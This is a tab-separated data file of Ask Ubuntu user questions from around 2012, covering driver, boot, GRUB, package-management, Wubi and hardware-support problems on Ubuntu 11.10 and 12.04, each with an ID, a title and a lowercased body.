132462	jdk7 post installation help	i was installing jdk7 on ubuntu 12.04 by following the guide posted on web8 . the commands posted in the guide were : sudo mkdir -p /usr/lib/jvm/ # just in case sudo mv java-7-oracle/ /usr/lib/jvm/ sudo add-apt-repository ppa : nilarimogard/webupd8 sudo apt-get update sudo apt-get install update-java sudo update-java till here everything went well . so hopefully jdk was installed correctly , but then when i tried to check the java version with the command : java -version ... it gave me this error : bash : /usr/bin/java : permission denied yes i know this is a permission related issue . and it can be solved using the sudo command , but can someone tell the exact command ? i also checked permissions using ls -l command and the output was : -rw -- -- -- - 1 ankit ankit 5650 jun 27 2011 java -rw -- -- -- - 1 ankit ankit 5805 jun 27 2011 javac none of the tutorials and videos i saw were having this issue why is it only me ? have i messed up with some default configurations ? do i need to change the permission to the /usr/ directory evrytime ? i know this may sound stupid to many here , but i really want to know exactly where i am going wrong .
132465	ubuntu 11.10 is very slow in dell insiron , with intel i5 , memory 500+4+1gb ?	i have a dell inspiron 15r laptop with intel core i5 processor , 500gb hdd , 4gb ram , & 1gb dedicated amd graphics . i installed ubuntu 11.10 64 bit . but it is very slow in my system . actually the windows which is pre-installeed boot up faster than this one . i installed ubuntu by seeing its speed in one of my friends system which lags in processor , memory , no graphics . but it works fine for him , he uses a lower version of ubuntu . why this in me ? ? is this this problem is solved in 12.04 ?
132471	is the absence of a boot screen ever going to be a problem ?	when i boot my computer , i 've never seen a boot screen . i only get a purple or black background for about 45-60 seconds ( which seems abnormally long to me , considering i have a fairly modern system and when the process of shutting down takes about 6 seconds tops ) . is this normal ? if not , any suggestions on a possible fix or what could be causing it ? i see it sometimes when i shut down , but is it normal that i never see this image on boot up :
132472	split video from mkv , avi , mp4	i 've a mkv video file and want to split some important scenes . is there any tool in ubuntu to split them . i 'm looking for gui tool . any help is appreciated .
132473	move desktop item titles to the side ?	how can i move the titles of items on my desktop to the right side instead of the bottom like one can on os x ? like this :
132474	12.04 lts 64 bits does not boot from hdd	i installed 12.04 lts 64 bits from a usb drive , but i ca n't seem to boot from the hdd . i have a single partition , with no other oses . i need to plug in the usb drive for the pc to boot ubuntu . is my install ok ?
132479	how to reduce time in apt-get update ?	i am using ubuntu 12.04 . it seems that it take lot of time for apt-get update . i can see that it spend lot of time for checking language translations file . how to disable translations checking while apt-get update ? i want only english . how to safely remove other language translations ?
132480	is it possible to run two versions of ubuntu side by side on a single machine using wubi ?	i 'm using ubuntu 11.10 installed using wubi ( os : windows 7 x64 ) . now can i install 12.04 lts on a different drive and use it side by side ? i do n't want to loose all the programs i have installed on ubuntu 11.10 and moreover i feel i need more space on the ubuntu portion . being installed using wubi it is not possible to increase the space normally . so now i think my options are either install ubuntu 12.04 on another drive and reinstall all the softwares i had or increase the wubi partition .
132487	upgraded to 12.04 before updating 11.10	i believe i 'm the only person that did that . i 've read that i must update my 11.10 before upgrading . then the next morning i just opened the update-manager and upgraded to 12.04 . i forgot all about that i have to update . anyway now i 'm getting some errors , is there anyway to fix the problem and install the missing dependencies or i just have to make a clean 12.04 install and lose all the time that it took me to tweak my ubuntu ?
132488	ubuntu 12.04 and nvidia driver	ever since upgrading to 12.04 64bit , i have a problem with my gtx 570 card . i use my hdtv as a computer monitor and have it connected via hdmi cable . in the nvidia settings , i would always uncheck/untick the `` force gpu scaling '' because if i did n't , my videos would drop fps in vlc with gpu acceleration enabled . with 11.10 , i did n't have any problem with this , but with 12.04 , once i uncheck `` force gpu scaling '' , the entire gui gets blurry and shaky . this is with the 295.40 and the latest 295.49 drivers . thanks in advance for anyone that can help .
132489	presario v2136 ap : which ubuntu os version ?	i have a compaq presario v2136ap ( processor : 1.6ghz , system memory : 224 mb ) . i want to install ubuntu . i am unsure of the os version to opt for . please help . thanks , astik
132490	transmission started to detect torrents bigger than they are	when i add a torrent the program works fine but after a few minutes it increases the value of total size . right now i am downloading a torrent of size 5.08 gb , but the program detects it as 5.45 gb . what may cause that kind of problem and how do i check whether files downloaded correctly ?
132492	ubuntu based os wo n't boot	i have tried installing lubuntu , xubuntu , kubuntu , and linux mint and after the install process is done they never boot up . the screen just turns black ans stays like that . bodhi linux works and debian does too but i want to run xubuntu or kubuntu on my computer . i have a netbook with 2gbs of ram , 160gbs of hdd and an intel atom 1.33ghz processor .
132496	how can i use arista transcoder or transmageddon to shrink videos ?	how can i use arista transcoder or transmageddon to shrink a video file ? any other recommendation for a software that can shrink videos ?
132521	how can i make my ubuntu 12.04 look like a mac ?	i want my ubuntu to look like mac os x . just icon and theme if possible ! is it possible ? is there any way to install slingshot launcher ?
132522	google earth in 12.04 ?	i was using google earth in 11.10 without problems . i recently upgraded to 12.04 with a clean install . machine is acer core i3 2nd gen. with 6gb ram . install is 64bit version . i am unable to run google earth as it freezes the system in 5 seconds after starting the program . i tried solutions posted in omg ubuntu for the ugly fonts problem with google earth . the ugly fonts were resolved but the program freeze was not . is there any solution ? level is beginner with ubuntu .
132525	drag and drop files in unity with 3 monitors	i have been experiencing an odd phenomenon in ubuntu unity ( 2d and 3d ) with 11.04/11.10 and 12.04 . i have three monitors running on nvidia gpus ( in ubuntu 12.04 , this configured itself with the restricted drivers and xinerama ) , and when i select a file ( or group of files ) from a window , although the mouse continues to hover where i begin to drag , the icons of the dragged file ( s ) appear one screen to the left . this would be a non-issue if releasing them did n't move them to where ever they are hovering . it 's like ubuntu is confused altogether which screen i am dragging from , since the positions correspond to the same location on a different monitor . i pondered this a couple times in the past but have n't been able to google myself an answer ( as i apparently ca n't describe this problem adequately to search ) , and now i have a fresh 12.04 ( x64 ) install where this is again happening . thanks for your consideration in advance .
132532	how can i rearrange the icons in unity launcher ?	given that i have no choice to move the launcher from the left of the screen . how do i change the order in which icons appear ? for example , libreoffice icons appear at a variety of positions , and i 'd like them to be grouped . i 'd also prefer to have the most commonly used icons visible on screen and only have to go scrolling for the less common ones as i only use a desktop screen , no hand held devices .
132535	i cant update my flash player - sonicwall issue	in my university webcentre i administer 20+ pcs having ubuntu 12.04 installed and updated up to date . the campus network has sonic wall , for everyone who need to access internet need to enter common password , and user name . sonic wall is logged in through firefox , after logging in a tiny firefox window appears , which needs to be minimized to connect to the internet . while updating flash , it asks to close firefox , then only flash player starts to install , but installation closes as when i close firefox , the internet stops .
132537	unity dash button	how to change the dash icon in the unity launcher ? when i follow the instructions in the link above ( yeah i know for 12.04 the directory must be changed to `` 5 '' from `` 4 '' ) , nothing happens when i log in .
132538	install ubuntu into the hard drive but to chose to boot from usb	i have a lenovo z570 with win7 homepremium 64 bit installed . it already has 4 primary partitions , so used easeus to create another logical drive in it . is there a way that i could install the os into that logical drive but choose to boot from a usb as i could n't install grub into the mbr of the disk ( may be pre-installed win7 has something to do with it ) . so i would want to achieve something like 1 . normally boot into win7 2 . connect usb and choose the usb to boot into ubuntu . please advice and help .
132540	canon mx300 does not print under 12.04	i used to print under 11.10 by using sane for mx360 , with no problem . upgrading to 12.04 the printing process goes to `` stop '' . the job-printer-state-message ( under job attributes ) says : `` the ppd version ( 5.2.7 simplified ) is not compatible with gutenprint 5.2.8-pre1 . ''
132555	help needed in understanding this command ?	echo off | sudo tee /sys/kernel/debug/vgaswitcheroo/switch in one of the questions in this forum , someone had posted this command to switch off graphics card to save power consumption and this worked like a charm almost reducing my battery consumption to less than half of what it consumed before . the contents of sys/kernel/debug/vgawitcheroo/switch file are 0 : igd : + : pwr:0000:00:02.0 1 : dis : : off:0000:01:00.0 i want to know what this command actually does , the significance of vgaswitcheroo/switch file and what is the piping that is happening in the command . can someone please explain this to me ?
132556	why totem , eog , ... ? have dark toolbars with default gnome-shell theme - adwaita ?	totem , eog , have dark toolbars for some reason : while other regular gtk3 applications have expected toolbar : this does n't look like preferred way , so why is it like this and how can i set all gtk3 applications to use uniform toolbars ?
132557	create keyboard shortcut to open home folder ( nautilus ) ?	i 'm running 12.04 inside vmware workstation . i 'd like to have the shortcut windows-e to open my home directory ( nautilus ) . i tried it two ways , but none worked : going to system settings / keyboard / shortcuts / launchers / home folder i press windows-e and it shows me super+e , but when i press this key combination , i see a small text box in the lower right corner of my screen and the character e inside just typed ( ? ? ) going to system settings / keyboard / shortcuts / custom shortcuts , add a new one named `` nautilus '' and command `` nautilus '' , but has the same effect : records my keystrokes but opens this weird text box in the lower right executing nautilus from gnome-terminal works , but nothing else . the other observation i made : i have windows+down to `` restore '' the current window . even when i use this combination , which is custom and works for this action , i can not open my home folder .
132559	reinstall ubuntu with more hard drive space	kind of a weird situation , but the thing is that i have installed ubuntu alongside with the windows 7 copy that came with my pc . now , installing from disc did not work , so i used wubi , and stupid as i was , i just dedicated 1 gib of space to ubuntu . now i want to erase ubuntu ( the 1 gib ) and install it again with something like 90-100 gib of space , but i do not know how i can do it easily . please , if you have an easy solution , help me !
132562	grub broken after upgrade to 12.04 lts -- no keyboard , ca n't fix with chroot	after upgrading from 11.10 to 12.04 , grub is completely broken . there seems to be an issue with the grub of the live image as well ( amd64 ) , it will not recognize my keyboard . ( works in bios and after booting live usb ) . i tried purging and reinstalling after chrooting from the live usb . i am able to update my system , but ca n't set up grub . i get an error message complaining about `` unsupported raid level : 149 '' what does it mean , there is no raid set up for this machine ? i tried reformatting the boot partition to no avail . if booting from hd , i get stuck at grub text interface with no keyboard . any ideas what to try next ? edit : i reinstalled from usb which made my system bootable again , but still many problems . at least some of the problems appear to be related to the nvidia driver , as mentioned here : 12.04 and nvidia card problem with nvidia geforce 7025 and removing the nvidia driver ( keeping nouveau ) seems to work better . i also found out that the keyboard was set to os in the bios , and setting it to bios gave me the keyboard back for the grub menu of the live usb system . duh . so many things turn out to be broken i think a clean install will be less of a pain than fixing it all .
132572	how much free space do i need to install fedora 16 using virtual box on ubuntu 11.10 ?	i have 2.5 gb left on my hdd . im using wubi installation . can i use virtual box to run fedora in this limited space ?
132574	how can i import new songs into my clementine library ?	after i 've installed clementine and imported ( for the first time ) my complete music library it seems to be impossible to add more songs . i can however effortlessly add songs to a playlist - but not to the big library . what am i doing wrong ?
132577	no sound in ubuntu except at log in	i installed ubuntu 12.04 a month ago and am using it till now . i failed to notice that all this time there was no sound at all while running ubuntu , even while playing a game in wine . the weird thing is that only the startup sound comes when i log in ( indian/african drum tone ) , then comes the utter silence . i tested both digital output ( s/pdif ) and the speakers in the sound settings but can hear nothing . any help ?
132584	ubuntu one sync folder to other destination	i 've selected my documents folder in ubuntu to sync with ubuntu one . on my windows partition , i 'd like to sync this contents with another folder like c : \ubuntushare . when i select the checkbox to sync my documents folder , it automaticaly selects my documents folder in my user folder . is it possible to change this location ?
132585	cairo dock for ubuntu 12.04	i was using ubuntu 11.10 with cairo dock version 2.4 without a problem . now , after the upgrade via a clean install of ubuntu 12.04 amd64 with cairo dock 3.x the system freezes and i have to restart . machine is acer with core i3 2nd generation and 6gb ram . is this a known bug ? is there a workaround ? i am a beginner with ubuntu
132587	unable to mount pendrives etc	all of a sudden in 11.10 i am no longer even though administrator able to mount new volumes such as pen drives . etc . also my user account unlock is now greyed out . if i log in as a guest i can mount volumes but not as administrator . everything else such as root etc seems ok its probably to do with the grayed in unlock on the user account . ideas please . update : if i hover mouse over padlock even though i am logged in its says system policy prevents changes contact your system administrator .
132588	problem updating ubuntu 12.04 lts , lost internet connection while installing flash plugin	i have a problem updating ubuntu 12.04 lts , i have lost internet connection while installing flash plugin , but i have recovered the internet connection but it has not continue the installation with 20 minutes left . thank you .
132591	killing zombie folder `ubuntu one`	i deleted my ubuntu one folder and rebooted but the folder came back . how can i kill this zombie folder ? edit : because there were suggestions that i uninstall ubuntu one , i must add that i want to use ubuntu one . the folder appears to be related to sharing . i will not be sharing from this machine and i do n't want a folder that i will not be using soon .
132592	how do i send a notify osd message to a remote user via ssh ?	sometimes we need to send a message to a remote user . we can display messages on our local desktop using notify osd , but we are unable to send a message to the remote user 's desktop . we tried the following : ssh user @ remote notify-send message - > sends message to the local display but not to the remote . ssh admin @ remote sudo -u user `` notify-send message '' sudo : notify-send user : command not found - > there was a command not found error . ssh -x user @ remote `` display=:0 notify-send message '' - > again sends the message to my local box only . is there any way to send a message to the remote desktop ?
132594	youtube videos wo n't fullscreen properly on dual monitor setup	when i try to make youtube videos fullscreen , they become boxed within the middle of the screen , with the control bar not on the bottom , like so . here you can see what it looks like including my second monitor ( which is smaller , hence the black bar at the bottom ) . 1st monitor = 1600x900 2nd monitor = 1024x768 this occurs on various installations of ubuntu i 've had , across multiple releases . no combination of open source and proprietary video and flash drivers seems to fix it . i 'm currently using the fglrx ati drivers and the latest flash version . this seems to only occur with youtube videos - i ca n't remember any other sites that cause the same problem . any fixes or workarounds ? thanks
132595	do i need to create root , swap , and home partitions in a specific order ?	i 've just installed win7 and left enough space on my hdd for ubuntu . i 'd like to create a root partition , a swap partition and a home partition . do i need to create them in a special order , at a special location and most importantly : which one should be primary and which one logical ?
132599	can not reinstall grub on a ubuntu and window system	i am using ubuntu since tw year and so i am assuming that i am not a total newbie into it . the problem arose yesterday when i used some creepy command to check wether or not it works on my system , resulting in the damage of the file system ( as what i thought ) , and when i restarted the laptop , i got nowhere but directly to the grub rescue so what i did is made a live ubuntu 10.10 cd and booted from it and gone to terminal and tried to reinstall grub but i could not get past to even mount the root drive ( /dev/sda2 ) is my root device . as it states : mount : wrong fs , bad option , bad superblock on /dev/sda2 , missing codepage or helper program , or other error in some cases useful info is found in syslog -- try dmesg | tail or so i used sudo lshw to check whether what file system is mounted , but /dev/sda2 just stated that it is a partition and it does not show any capabilities other than being a linux partitions . it even does not show the ext4 file system of it . now when i thought of the idea of checking the disk for the errors , i ran the command fsck /dev/sda2 and tried to repair the corrupted file system . it took a long time and patience , but i only succeeded in viewing the partition and mounting it . i even could not access any file from it and could not re-install the grub loader into it . please help ! ! ! ps- i followed every method described here , for the problem looked quite similar to it , but no success for me .
132601	how can i upgrade nginx after adding ppa : nginx/development ?	i 've installed nginx via the ppa stable repository via ď add-apt-repository ppa : nginx apt-get install nginx which adds the stable release . but now i 'd like to switch to the development branch , so i added apt-add-repository ppa : nginx/development and now even though it shows the newer version with apt-cache show nginx package : nginx priority : optional section : httpd installed-size : 92 maintainer : kartik mistry < kartik @ debian.org > architecture : all version : 1.2.0-1ppa1~lucid depends : nginx-full | nginx-light filename : pool/main/n/nginx/nginx_1.2.0-1ppa1~lucid_all.deb size : 58892 it still does n't upgrade with apt-get upgrade or apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . do i need to reinstall it after removing the stable source ? or is there any other way to just do an upgrade ? i 'm running ubuntu 10.04 .
132603	is hp deskjet f4488 supported ?	is hp deskjet f4488 supported by ubuntu 11.10. if yes how to interface it and in not why not . ?
132610	force upperdir overlayfs to re reread/reload lowerdir	i am having the following problem with an overlayfs : i can mount an overlayfs fine using the following line in my etc/fstab none /home/student overlayfs lowerdir=/home/student , upperdir=/home/.student_rw 0 0 this works great and the mount command displays the overlayfs corretly : pc : ~ $ mount -l -t overlayfs none on /home/student type overlayfs ( rw , lowerdir=/home/student , upperdir=/home/.student_rw ) so now when a student logs out of the machine i delete the contents of /home/.student_rw using a script - which also works fine . the problem is that the student logging in , should find a clean home directory with the settings preconfigured in ( /home/student ) as the overlayfs does not touch the lowerdir folder . the exact same approach worked very well for aufs , which are no longer supported in precise . interestingly , the overlayfs approach works fine as long as i reboot the machine . so how can i fix this problem ? for me a possible solution seems to be to let the upperdir reread the lowerdir . how would i do that ? thanks
132611	is it necessary to have openjdk 6 installed in ubuntu 12.04 ?	is it necessary to have openjdk 6 installed in ubuntu 12.04 or will openjdk 7 provide all the support i will need for java functionality ( generally speaking ) ?
132616	how do i configure keyboard layouts using xmonad as my window manager ?	so ubuntu has moved to hal , and commented out the keyboard section in xorg.conf . so how do i configure keyboard layouts now ? upd : i 'm using xmonad as my window manager , so i need a way to configure layouts that works outside gnome too . upd : editing xorg.conf does not work , here 's the relevant section from mine : section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' option `` xkblayout '' `` us , ru '' option `` xkboptions '' `` grp : ctrl_shift_toggle , caps : ctrl_modifier , compose : sclk , terminate : ctrl_alt_bksp , grp_led : scroll '' endsection
132618	compiz - green transparent textures ?	unity dash , launcher and notifications goes green after a short moment after login . that happened here : i use the fglrx driver on my ati mobility radeon hd 4200 series graphics card . does anybody know how to fix that ?
132624	open custom dialog windows ( pygtk + quickly )	i have just downloaded quickly , created a new project , set up simple gui and created new dialog ( quickly add dialog create ( as you can see , i called it create ) ) . i already have click handler in the main window but i do n't know how to open my createdialog from there . p.s . i am new to pygtk , glade and quickly but i am not new to programming overall .
132633	'sudo apt-get update ' always re-updates by force ?	i have a fresh install of 12.04 . if i understand correctly , sudo apt-get update is supposed to update everything the first time it 's run , and then only update repositories which have changed since the last update , right ? however , this command seems to be updating all repositories every time i run it . that is , even if i run the command twice back-to-back , the second command will re-update all repositories again by force . this is disturbing to me , since i have a slow ( 512 kbps ) internet connection . what could be the problem ?
132635	using linux on windows xp without installing it	i am very new to linux . i have downloaded and created ubuntu 11.10 dvd . i would first like to try its complete features without actually installing it on my desktop . i am trying it on my old desktop which is running on windows xp and amd anthlon 2000xp processor . my computer is not recognizing the dvd even though i have the ubuntu dvd in tray at time of start up . even if i choose the option 'help me boot from cd ' by clicking on 'wubi ' icon on dvd drive in windows environment , it gives error that `` windowsbackend '' object has no attribute 'cd_path ' . i have checked but there is no error in downloading and burning dvd . please advise how to resolve this issue .
132638	lost some files after i cut and pasted in ubuntu 12.04	i cut some files to paste it somewhere else and when i was in the location to paste , the paste option was disabled . i go back to where it was ( the source from where i cut the folders ) and the files was n't there . so i did some exploring for the files and i found it in the trash . i tried to restore the files , but that fails with an error restore missing files . how to get my files back ?
132640	dell d630 with ubuntu 12.04 : fail to shut down	i have a dell d630 laptop with an updated ubuntu 12.04 . it 's not a clean installation , but an upgrade coming from 11.10 . after clicking on `` shut down '' , the screen goes black but it keeps with the energy light on . it does n't shut down . the system is up to date . anyone with the same problem ? any fix ?
132643	can not change display resolution on a sony vgn-fz21m	my sony notebook vgn-fz21m does have a nvidia grafic card with a vesa g86 board - e415h01 . my problem is , that i can not change the display resolution from 1024*768 ( 4:3 ) to 1980*1280 . i tried to in the system settings but there is no higher resolution shown . also when i try to install a nvidia driver there is no difference . is it maybe possible to change resolution independently ?
132645	why does japanese filenames not show on ubuntu server and samba ?	i 've installed japanese fonts sudo apt-get install ttf-takao-mincho and i mounted my drive specifying utf8 sudo mount -t vfat /dev/sdc1 /media/hermes -o uid=1000 , gid=1000 , iocharset=utf8 , dmask=027 , fmask=137 but japanese file names show up as ? ? ? in terminal and on my samba share , it shows up as numbers+characters . how do i fix this ?
132651	ubuntu wo n't start after install	i loaded 12.04 into windows . after rebooting i selected ubuntu , i got the purple ubuntu screen . the dots under ubuntu cycled , but then it went to a black screen that said : gave up waiting for root device . common problems : âś and then : alert ! /devdisk/by-uuid/fc9acfd19acf869c does not exist . dropping to a shell !
132653	how can i make `` apt-get update '' faster with a slow internet connection ?	i have a slow internet connection and every time i add a new ppa to install software i need to run apt-get update . this takes about 10 minutes or so , i was wondering if there was a way to initiate a partial update for the newly added ppa 's .
132654	ubuntu 12.04 separate x screen nvidia black dashboard and window decoration	os : ubuntu 12.04 grafic card : nvidia gtx 9800+ first monitor : view sonic 1920x1080 second monitor : samsung 1280x1024 in nvidia x server settings set `` separate x screen '' with enable xinerama everything work but dashboard become black ( without opacity ) , in some app ( firefox , nvidia x server settings , etc . ) , window decoration become classic , but in nautilus like in settings `` ambiance '' , when move mouse between monitors in view sonic mouse start position padding-left 1280px ) . any idea how to fix or where email ? p.s . nvidia driver version 295.40 .
132661	ubuntu 12.04 restarts to login constantly	i 've tried the below settings which did n't seem to affect the restarts . sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current i am now running the latest nvidia drivers from the website installed manually and i 'm still having problems with persistent restarts ( below from the kern log ) . any ideas on anything different i can do to try and resolve the problem ? may 6 07:16:47 jeremy-system-product-name kernel : [ 35742.561193 ] nvrm : xid ( 0000:01:00 ) : 6 , pe0001 may 6 07:16:47 jeremy-system-product-name kernel : [ 35742.586301 ] xorg [ 13681 ] : segfault at b4f21000 ip b487d4a6 sp bf850eb0 error 7 in nvidia_drv.so [ b47a4000+707000 ] may 6 07:18:04 jeremy-system-product-name kernel : [ 35819.932420 ] nvrm : xid ( 0000:01:00 ) : 1 , channel 00000001 method 00000000 data 000803c0 may 6 07:18:06 jeremy-system-product-name kernel : [ 35821.934616 ] nvrm : os_schedule : attempted to yield the cpu while in atomic or interrupt context may 6 07:18:08 jeremy-system-product-name kernel : [ 35823.958149 ] xorg [ 20188 ] : segfault at b4efb000 ip b48584a6 sp bfca8340 error 7 in nvidia_drv.so [ b477f000+707000 ]
132662	how can i make a disk image of a hard disk with windows 7 and ubuntu installed side-by-side ?	i had ubuntu 11.10 installed on my hard disk with windows 7 in a multi-boot arrangement . if i wanted to make a backup copy of the entire disk , i used clonezilla , and it worked fine . if there was a problem with windows or ubuntu , i simply restored them both by using the clonezilla backup copy of the entire hard disk . a few days ago , i upgraded to ubuntu 12.04 . i now had a hard disk with windows 7 and ubuntu 12.04 in the same kind of multi-boot arrangement as before . however , every time i tried to make the same kind of backup copy as before , clonezilla reported `` something went wrong . '' i tried this several times , and the same thing happened . i reinstalled windows 7 alone , and clonezilla works fine . but as soon as i install ubuntu 12.04 alongside it on the hard disk , and try to make a backup copy with clonezilla , i get the same report , `` something went wrong . '' i have reinstalled windows 7 alone so that at least i can make a backup copy of windows 7 , if there 's a problem , but i 'd also like to have ubuntu 12.04 installed alongside it on the same hard disk . i do n't dare do that , though , because it would be impossible to make a backup copy . if clonezilla no longer works with ubuntu in a multi-boot arrangement , can anyone suggest imaging software that would allow me to make a backup copy of my hard disk , the way i could with a windows 7 and ubuntu 11.04 multi-boot ?
132665	can twitter monitor my browsing activities when using a client like hotot or gwibber ?	being concerned by privacy issues when connecting to the internet , i know twitter can monitor our activities if we do n't logout and use some kind of firefox extension to prevent from being tracked . i would like to know if twitter can monitor my browsing activities if i leave a twitter client like gwibber or hotot open while i surf the web .
132666	message indicator does n't indicate new messages	i recently set up gwibber and thunderbird , but whenever there is new mail or tweets , the message indicator icon does n't change to the new message icon . i 'm currently using faenza-ambience icon theme , but i have also tried the default ubuntu-mono-dark theme and the problem still persists . is this a bug or feature ? how can i get it to indicate new messages ? i 'm on 12.04 .
132670	what 's size of upgrading from desktop ? in update manager app ?	i 'm using ubuntu 11.10 and wan na to update to 12.04 lts . i want to know the size of upgrade from my desktop pc . please , tell me that thanks
132673	ca n't find wireless networks - netgear wn311b , 12.04	i 'm using a netgear wn311b pci wireless adapter on my desktop . the device works without problems under windows ( dual boot ) . i have enabled the broadcom sta wireless drivers in `` additional drivers '' . this is the output of /etc/log/syslog when i enable wireless in the wicd dialog : may 6 16:50:41 cosine networkmanager [ 816 ] : < info > wifi now enabled by radio killswitch may 6 16:50:41 cosine networkmanager [ 816 ] : < info > ( eth2 ) : bringing up device . may 6 16:50:41 cosine wpa_supplicant [ 2693 ] : nl80211 : 'nl80211 ' generic netlink not found may 6 16:50:41 cosine networkmanager [ 816 ] : < info > ( eth2 ) : supplicant interface state : starting - > ready may 6 16:50:41 cosine networkmanager [ 816 ] : < info > ( eth2 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] may 6 16:50:41 cosine networkmanager [ 816 ] : < info > ( eth2 ) : supplicant interface state : ready - > inactive may 6 16:50:41 cosine networkmanager [ 816 ] : < warn > trying to remove a non-existant call id . may 6 16:50:42 cosine avahi-daemon [ 795 ] : joining mdns multicast group on interface eth2.ipv6 with address fe80 : :21f:33ff : feb3 : b184 . may 6 16:50:42 cosine avahi-daemon [ 795 ] : new relevant interface eth2.ipv6 for mdns . may 6 16:50:42 cosine avahi-daemon [ 795 ] : registering new address record for fe80 : :21f:33ff : feb3 : b184 on eth2.* . this is the result when i run `` sudo iwlist eth2 scan '' : eth2 no scan results this is the output of lsmod : module size used by wl 2568210 0 nvidia 12319264 40 rfcomm 47604 0 snd_hda_codec_via 51398 1 bnep 18281 2 bluetooth 180104 10 rfcomm , bnep parport_pc 32866 0 snd_hda_intel 33773 3 ppdev 17113 0 snd_hda_codec 127706 2 snd_hda_codec_via , snd_hda_intel lib80211_crypt_tkip 17390 0 snd_usb_audio 122982 1 snd_pcm 97188 3 snd_hda_intel , snd_hda_codec , snd_usb_audio uvcvideo 72627 0 videodev 98259 1 uvcvideo snd_hwdep 13668 2 snd_hda_codec , snd_usb_audio snd_usbmidi_lib 25395 1 snd_usb_audio psmouse 87692 0 v4l2_compat_ioctl32 17128 1 videodev snd_seq_midi 13324 0 snd_rawmidi 30748 2 snd_usbmidi_lib , snd_seq_midi joydev 17693 0 lib80211 14381 2 wl , lib80211_crypt_tkip snd_seq_midi_event 14899 1 snd_seq_midi serio_raw 13211 0 snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event asus_atk0110 18078 0 snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq snd 78855 19 snd_hda_codec_via , snd_hda_intel , snd_hda_codec , snd_usb_audio , snd_pcm , snd_hwdep , snd_usbmidi_lib , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mac_hid 13253 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp vesafb 13844 1 r8169 62099 0 usbhid 47199 0 hid 99559 1 usbhid this is the output of `` sudo lshw -c network '' : *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 02 serial : 48:5b:39 : d1:74 : b4 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.0.2 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:44 ioport : e800 ( size=256 ) memory : f8eff000-f8efffff memory : f8ee0000-f8eeffff memory : feaf0000-feafffff *-network description : wireless interface product : bcm4321 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth2 version : 01 serial : 00:1f:33 : b3 : b1:84 width : 32 bits clock : 33mhz capabilities : bus_master ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=64 multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : febfc000-febfffff i 'm at a loss . i 've tried using wicd , without results . i 've tried removing and reinstalling the card . i 've tried removing the driver and modprobing it . i 've tried disabling the sta driver . what am i doing wrong ?
132675	which folders i can delete to free hdd space in ubuntu ?	can i delete /usr/share/doc ? which system files i can safely delete to free hdd space ? im running out of space ( only 1.9 gb left ) . i have wubi installation of ubuntu 11.10 .
132677	did i do something wrong while trying to recover files with foremost ?	when i run this command on foremost , sudo foremost -i /dev/hda -o /recovery/foremost i get , processing : stdin this right or did i miss a step when i followed this guide .
132683	skype on ubuntu 12.04 lts	i 've lost my skype application after upgrading to 12.04 lts . i wanted to download it from skype.com to reinstall , but they do n't have a version for 12.04 . what should i do ?
132688	installing programs without having internet	i have a friend that has a ubuntu machine ( 10.04 ) and has no internet . they want some programs that dont require the internet to function . music production programs . but idk how to download a program from the software center or a ppa to put on usb . any help ? i want something simple . i dont want to have to know all the packages the software center usually downloads with each program install .
132696	question about ole files	are the open format files that are saved with libreoffice and openoffice act like the ole files that are saved with ms office ?
132697	ca n't install anything in software center	i just installed ubuntu 12.04 on my system and i ca n't install anything from the software center . when i click the install button nothing happens at all . no error , just does n't work . i originally had these issues but the solution listed there worked for me . installing packages from the command line with apt-get and dpkg works . i also tried following the advice in this thread but to no avail . edit : running from the command line i get no messages when i try and click the install button but get a warning when it 's started : 2012-05-06 12:14:04,481 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-05-06 12:14:04,536 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-05-06 12:14:04,988 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file edit 2 : seems i slightly stupid and just realized that it 's disabled out ( guess i 'm not used to the ubuntu gui yet ) . realizing this i googled and found this workaround , but still does anyone know of a solution ?
132698	ca n't load ubuntu in windows xp ( sp3 )	i just installed ubuntu 12.04 through windows installer , every thing was fine but after rebooting , i can see the list of operating systems in the boot menu , but when i go to ubuntu and press enter , i 'm getting the message as try ( hd0,0 ) : fat32 : error : '' prefix '' is not set . please help me ... .
132701	how do i install ubuntu on an hp g62 ?	i 've tried to install ubuntu 11.04 and 12.04 , but i have the same problem on both . i proceed like this : i restart my computer , the language menu shows and i select my language , and then select to set up ubuntu . then i get a black page , and nothing else . i have an ati graphics card . my laptop is an hp g62 series . what should i do to make the install work ?
132702	how to detect unsupported packages ?	i upgrade from 11.10 to 12.04lts . i choose ubuntu to have a secure system for 5 years . unfortunately i do n't wrote down all packages which get no longer updates from canonical like defoma . so i wonder how i could detect all such packages and remove them ? coming from debian a command-line solution is preferred , but a gui solution is acceptable .
